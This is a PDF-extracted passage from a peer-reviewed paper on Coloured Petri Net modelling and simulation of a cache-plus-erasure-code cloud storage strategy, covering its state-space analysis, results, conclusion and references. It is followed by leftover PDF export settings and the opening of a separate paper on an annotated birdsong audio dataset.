token from the place “SendQueue”. SIMULATION Numerous reenactment tools are used to demonstrate and execute a framework, like, process model, SocNetV, Network Workbench. However, it is essential to mention that CPN based formalism supports simulation through CPN Tools. To check the behaviour of the proposed model, we run several manual and ten fully automated simulations of the proposed model with CPN Tools. Figure 10 represents a partial simulation of the model through its intermediate marking (state). In order to get the average completion time of total requests to get both cached and non-cached data, ten simulations are performed (see Table 6). Further, Table 6 shows that simulation 2 gives the high completion time to get cached and non-cached data. ANALYSIS To analyze the performance of the proposed model, we performed the following: Verification of model State-space analysis of the proposed model is performed to monitor the proposed strategy's possible behavior and amend them accordingly (see Table 5). Figure 10 Partial simulation of the module. Full-size DOI: 10.7717/peerj-cs.351/fig-10 Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 15/22 http://dx.doi.org/10.7717/peerj-cs.351/fig-10 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Performance analysis To evaluate the performance of the modeled strategy, average delay, throughput, and average queue lengths are collected by performing ten simulations of the model. For such purpose, monitors are applied on the transitions “Check Request”, “Cache Checked”, “Split Data”, “Get Data”, “Reg Data” and “Receive” and places “CacheHit”, “CacheMis1”, “Split”, “Reconstruct Data” and “Response”. Statistical analysis of output data is performed. Standard behavioral properties and trace patterns generated by our model are analyzed by state space report. Table 5 illustrates the partial statistics generated by state space with 300 s. It reveals that the occurrence Graph (O-graph) has 56,744 nodes and 56,744 arcs. Further, these statistics also depict the boundedness properties. The Upper bound shows the maximum number of tokens in a place, while the lower bound shows the minimum number of tokens that can be added to a specific place. It shows that places Table 5 State space report of the model. Statistics for O-graph State Space State Space Nodes: 56744 Arcs: 56746 Secs: 300 Status: 56746 Scc Graph Nodes: 56744 Arcs: 56746 Secs: 2 Boundedness Properties Best Integer Bounds Upper Lower Cache ′ Cache 1 1 1 DB1 ′ DB1 1 1 1 Main ′ Check_Cache 3 0 Main ′ Request 9 3 Main ′ Send_to_Cache 4 0 Main ′ Response 6 0 Network ′ Next_Receive 1 1 Network ′ Next_Send 1 1 Liveness Properties Dead Markings 409 [543, 2369, 6744, 7430, : : : ] Dead Transition Instances None Live Transition Instances None Fairness Properties No infinite occurance sequences. Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 16/22 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Cache, DB1, Next_Receive and Next_Send have both upper and lower bound 1, which means these places always have one token. However, the upper bound of the place “Request” is 9, while it's lower bound is 3. Further, place “Response” has upper bound 6 and lower bound equal to zero. It shows that at most 6 requests from place “Request” has been fulfilled and stored in place “Response”. Liveness properties disclose that there exist 409 dead markings. Dead markings are those markings that have no enabled binding elements. Such dead markings are interpreted as final or terminal markings and not deadlock states of the modeled system. The state-space specifies that the model is partially correct and generated results are correct. Therefore, the state-space analysis conveys that the modeled system behaves Figure 11 State space graph. Full-size DOI: 10.7717/peerj-cs.351/fig-11 Table 6 Completion time. Completion time CACHED NON CACHED Simulation 1 114 187 Simulation 2 148 205 Simulation 3 98 151 Simulation 4 107 162 Simulation 5 102 132 Simulation 6 99 144 Simulation 7 133 161 Simulation 8 87 142 Simulation 9 127 174 Simulation 10 118 149 Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 17/22 http://dx.doi.org/10.7717/peerj-cs.351/fig-11 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ according to the requirements and the specifications. Further, the model preserves the properties required for the utilization of storage resources. The full state space of CPN has 56,744 nodes and 56,744 arcs, which cannot be depicted in the reachability graph. Therefore, Fig. 11 shows a graphical representation of state space from marking M 1–M 4913 by skipping some intermediate markings. In CPN Tools, data collection monitors are applied to compute the average completion time. Table 6 depicts the average completion time of total requests to get both cached and non-cached data for ten simulations. Figure 12 also represents the completion time for each simulation performed. It shows that in each simulation, cached data takes less time than non-cached. Therefore, it shows that the proposed approach improves storage resource utilization. Further, it validates the precision of our approach. CONCLUSION This research is about the issues of data storage and retrieval from cloud-based data centers. Storage cost and bandwidth latency are the two major factors that influence the performance of a system. To reduce the bandwidth latency, most cloud service providers are using multiple copies of data, each on a separate data center across the world. Moreover, data centers are expensive to build and also are unfriendly to the environment. Erasure codes are the techniques that store data of n chunks in n + k data places. However, erasure codes need some extra computation time to regenerate the data. CAROM combined both techniques for dual benefits. This research formally modeled CAROM using CPN formalism. Furthermore, we formally verified our model with space state analysis. Moreover, we formally analyzed the performance of our model by performing several simulations using monitors in Figure 12 Completion time. Full-size DOI: 10.7717/peerj-cs.351/fig-12 Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 18/22 http://dx.doi.org/10.7717/peerj-cs.351/fig-12 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ CPN-Tools. Performance reports generated by CPN-Tools show that the model outperforms the others. In the presented model, the cache size is fixed. The cache is replaced by using the Least Frequently Used replacement algorithm. In the future, we will use some heuristic algorithms to resize and replace the cache in cloud-based systems. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Muhammad Rizwan Ali conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � Farooq Ahmad conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � Muhammad Hasanain Chaudary performed the computation work, prepared figures and/or tables, and approved the final draft. � Zuhaib Ashfaq Khan conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Mohammed A. Alqahtani performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. � Jehad Saad Alqurni performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Zahid Ullah performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Wasim Ullah Khan performed the experiments, prepared figures and/or tables, and approved the final draft. Data Availability The following information was supplied regarding data availability: Raw data are available as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.351#supplemental-information. REFERENCES Adil SH, Raza K, Ahmed U, Ali SSA, Hashmani M. 2015. Cloud task scheduling using nature inspired meta-heuristic algorithm. In: 2015 International Conference on Open Source Systems & Technologies (ICOSST). Piscataway: IEEE, 158–164. Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 19/22 http://dx.doi.org/10.7717/peerj-cs.351#supplemental-information http://dx.doi.org/10.7717/peerj-cs.351#supplemental-information http://dx.doi.org/10.7717/peerj-cs.351#supplemental-information http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Ahmed M, Chowdhury ASMR, Ahmed M, Rafee MMH. 2012. An advanced survey on cloud computing and state-of-the-art research issues. IJCSI International Journal of Computer Science Issues 9(1):201–207. Beloglazov A, Abawajy J, Buyya R. 2012. Energy-aware resource allocation heuristics for efficient management of data centers for cloud computing. Future Generation Computer Systems 28(5):755–768 DOI 10.1016/j.future.2011.04.017. Buyya R, Ranjan R, Calheiros RN. 2010. Intercloud: utility-oriented federation of cloud computing environments for scaling of application services. In: International Conference on Algorithms and Architectures for Parallel Processing, Berlin: Springer, 13–31. Buyya R, Yeo CS, Venugopal S, Broberg J, Brandic I. 2009. Cloud computing and emerging IT platforms: vision, hype, and reality for delivering computing as the 5th utility. Future Generation Computer Systems 25(6):599–616 DOI 10.1016/j.future.2008.12.001. De Assunção MD, Di Costanzo A, Buyya R. 2010. A cost-benefit analysis of using cloud computing to extend the capacity of clusters. Cluster Computing 13(3):335–347 DOI 10.1007/s10586-010-0131-x. Dillon T, Wu C, Chang E. 2010. Cloud computing: issues and challenges. In: Advanced Information Networking and Applications (AINA), 2010 24th IEEE International Conference on, IEEE, 27–33. Emerson EA, Sistla AP. 1996. Symmetry and model checking. Formal Methods in System Design 9(1):105–131 DOI 10.1007/BF00625970. Gan GN, Huang TL, Gao S. 2010. Genetic simulated annealing algorithm for task scheduling based on cloud computing environment. In: Intelligent Computing and Integrated Systems (ICISS), 2010 International Conference on, IEEE, 60–63. Hosseinimotlagh S, Khunjush F, Samadzadeh R. 2015. SEATS: smart energy-aware task scheduling in real-time cloud computing. Journal of Supercomputing 71(1):45–66 DOI 10.1007/s11227-014-1276-9. Javadi B, Abawajy J, Buyya R. 2012. Failure-aware resource provisioning for hybrid Cloud infrastructure. Journal of Parallel and Distributed Computing 72(10):1318–1331 DOI 10.1016/j.jpdc.2012.06.012. Jensen K. 2013. Coloured Petri nets: basic concepts, analysis methods and practical use. Vol. 1. Berlin: Springer Science & Business Media. Jensen K, Kristensen LM. 2009. Coloured Petri nets: modelling and validation of concurrent systems. Berlin: Springer Science & Business Media. Kamboj S, Ghumman NS. 2016. A survey on cloud computing and its types. In: 2016 3rd International Conference on Computing for Sustainable Global Development (INDIACom). Piscataway: IEEE, 2971–2974. Klein C, Maggio M, Årzén KE, Hernández-Rodriguez F. 2014. Brownout: Building more robust cloud applications. In: Proceedings of the 36th International Conference on Software Engineering, ACM, 700–711. Kumar P, Verma A. 2012. Independent task scheduling in cloud computing by improved genetic algorithm. International Journal of Advanced Research in Computer Science and Software Engineering 2(5). Lee YC, Zomaya AY. 2012. Energy efficient utilization of resources in cloud computing systems. Journal of Supercomputing 60(2):268–280 DOI 10.1007/s11227-010-0421-3. Ma Y, Nandagopal T, Puttaswamy KP, Banerjee S. 2013. An ensemble of replication and erasure codes for cloud file systems. In: INFOCOM, 2013 Proceedings. Piscataway: IEEE, 1276–1284. Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 20/22 http://dx.doi.org/10.1016/j.future.2011.04.017 http://dx.doi.org/10.1016/j.future.2008.12.001 http://dx.doi.org/10.1007/s10586-010-0131-x http://dx.doi.org/10.1007/BF00625970 http://dx.doi.org/10.1007/s11227-014-1276-9 http://dx.doi.org/10.1016/j.jpdc.2012.06.012 http://dx.doi.org/10.1007/s11227-010-0421-3 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Mastelic T, Oleksiak A, Claussen H, Brandic I, Pierson JM, Vasilakos AV. 2015. Cloud computing: survey on energy efficiency. ACM Computing Surveys 47(2):33–36 DOI 10.1145/2656204. Mateescu G, Gentzsch W, Ribbens CJ. 2011. Hybrid computing—where HPC meets grid and cloud computing. Future Generation Computer Systems 27(5):440–453 DOI 10.1016/j.future.2010.11.003. Mateljan V, Čišić D, Ogrizović D. 2010. Cloud database-as-a-service (DaaS)-ROI. In: The 33rd International Convention MIPRO. Piscataway: IEEE, 1185–1188. Mathew T, Sekaran KC, Jose J. 2014. Study and analysis of various task scheduling algorithms in the cloud computing environment. In: ICACCI, 2014 International Conference on Advances in Computing, Communications and Informatics. Piscataway: IEEE, 658–664. Mattess M, Vecchiola C, Buyya R. 2010. Managing peak loads by leasing cloud infrastructure services from a spot market. In: 2010 12th IEEE International Conference on High Performance Computing and Communications (HPCC). Piscataway: IEEE, 180–188. Mell P, Grance T. 2011. The NIST definition of cloud computing. Washington, D.C.: U.S. Department of Commerce. Mhedheb Y, Jrad F, Tao J, Zhao J, Kołodziej J, Streit A. 2013. Load and thermal-aware VM scheduling on the cloud. In: International Conference on Algorithms and Architectures for Parallel Processing, Cham: Springer, 101–114. Milner R. 1997. The definition of standard ML: revised. Cambridge: MIT Press. Patterson DA. 2008. The data center is the computer. Communications of the ACM 51(1):105 DOI 10.1145/1327452.1327491. Sajid M, Raza Z. 2013. Cloud computing: issues & challenges. International Conference on Cloud, Big Data and Trust 20(13):13–15. Shen Y, Bao Z, Qin X, Shen J. 2017. Adaptive task scheduling strategy in cloud: when energy consumption meets performance guarantee. World Wide Web—Internet and Web Information Systems 20(2):155–173. Ullman JD. 1998. Elements of ML programming ML97 edition. Vol. 2. Upper Saddle River: Prentice Hall. Varghese B, Buyya R. 2018. Next generation cloud computing: New trends and research directions. Future Generation Computer Systems 79:849–861 DOI 10.1016/j.future.2017.09.020. Virendra M, Jadliwala M, Chandrasekaran M, Upadhyaya S. 2005. Quantifying trust in mobile ad-hoc networks. In: Integration of Knowledge Intensive Multi-Agent Systems, 2005. Piscataway: IEEE, 65–70. Wu CM, Chang RS, Chan HY. 2014. A green energy-efficient scheduling algorithm using the DVFS technique for cloud datacenters. Future Generation Computer Systems 37:141–147 DOI 10.1016/j.future.2013.06.009. Xia Y, Zhou M, Luo X, Pang S, Zhu Q. 2015. A stochastic approach to analysis of energy-aware DVS-enabled cloud datacenters. IEEE Transactions on Systems, Man, and Cybernetics: Systems 45(1):73–83 DOI 10.1109/TSMC.2014.2331022. Yuan H, Bi J, Tan W, Li BH. 2017. Temporal task scheduling with constrained service delay for profit maximization in hybrid clouds. IEEE Transactions on Automation Science and Engineering 14(1):337–348 DOI 10.1109/TASE.2016.2526781. Zhan ZH, Liu XF, Gong YJ, Zhang J, Chung HSH, Li Y. 2015. Cloud computing resource scheduling and a survey of its evolutionary approaches. ACM Computing Surveys 47(4):63 DOI 10.1145/2788397. Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 21/22 http://dx.doi.org/10.1145/2656204 http://dx.doi.org/10.1016/j.future.2010.11.003 http://dx.doi.org/10.1145/1327452.1327491 http://dx.doi.org/10.1016/j.future.2017.09.020 http://dx.doi.org/10.1016/j.future.2013.06.009 http://dx.doi.org/10.1109/TSMC.2014.2331022 http://dx.doi.org/10.1109/TASE.2016.2526781 http://dx.doi.org/10.1145/2788397 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Zhao Q, Xiong C, Yu C, Zhang C, Zhao X. 2016. A new energy-aware task scheduling method for data-intensive applications in the cloud. Journal of Network and Computer Applications 59:14– 27 DOI 10.1016/j.jnca.2015.05.001. Zuo L, Shu L, Dong S, Zhu C, Hara T. 2015. A multi-objective optimization scheduling method based on the ant colony algorithm in cloud computing. IEEE Access 3:2687–2699 DOI 10.1109/ACCESS.2015.2508940. Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 22/22 http://dx.doi.org/10.1016/j.jnca.2015.05.001 http://dx.doi.org/10.1109/ACCESS.2015.2508940 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Petri Net based modeling and analysis for improved resource utilization in cloud computing Introduction Related work Colored petri nets Formal model of carom Simulation Analysis Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_ue4rck5t3fcszm254rhwc6ucoa ---- Submitted 1 May 2019 Accepted 31 August 2019 Published 7 October 2019 Corresponding author Veronica Morfi, g.v.morfi@qmul.ac.uk Academic editor Shawn Gomez Additional Information and Declarations can be found on page 10 DOI 10.7717/peerj-cs.223 Copyright 2019 Morfi et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS NIPS4Bplus: a richly annotated birdsong audio dataset Veronica Morfi1, Yves Bas2,3, Hanna Pamuła4, Hervé Glotin5 and Dan Stowell1 1 Machine Listening Lab, Centre for Digital Music (C4DM), Department of Electronic Engineering and Computer Science, Queen Mary University of London, London, United Kingdom 2 Centre d’Ecologie et des Sciences de la Conservation (CESCO), Muséum National d’Histoire Naturelle, CNRS, Sorbonne Université, Paris, France 3 Centre d’Ecologie Fonctionnelle et Evolutive (CEFE), CNRS, Université de Montpellier, Université Paul-Valéry Montpellier, Montpellier, France 4 Department of Mechanics and Vibroacoustics, AGH University of Science and Technology, Kraków, Poland 5 CNRS, LIS, DYNI team, SABIOD, Université de Toulon (UTLN), Aix Marseille Université (AMU), Marseille, France ABSTRACT Recent advances in birdsong detection and classification have approached a limit due to the lack of fully annotated recordings. In this paper, we present NIPS4Bplus, the first richly annotated birdsong audio dataset, that is comprised of recordings containing bird vocalisations along with their active species tags plus the temporal annotations acquired for them. Statistical information about the recordings, their species specific tags and their temporal annotations are presented along with example uses. NIPS4Bplus could be used in various ecoacoustic tasks, such as training models for bird population monitoring, species classification, birdsong vocalisation detection and classification. Subjects Bioinformatics, Computational Biology, Data Mining and Machine Learning, Databases, Multimedia Keywords Audio dataset, Bird vocalisations, Ecosystems, Ecoacoustics, Rich annotations, Bioinformatics, Audio signal processing, Bioacoustics INTRODUCTION The potential applications of automatic species detection and classification of birds from their sounds are many (e.g., ecological research, biodiversity monitoring, archival) (Dawson & Efford, 2009; Lambert & McDonald, 2014; Drake et 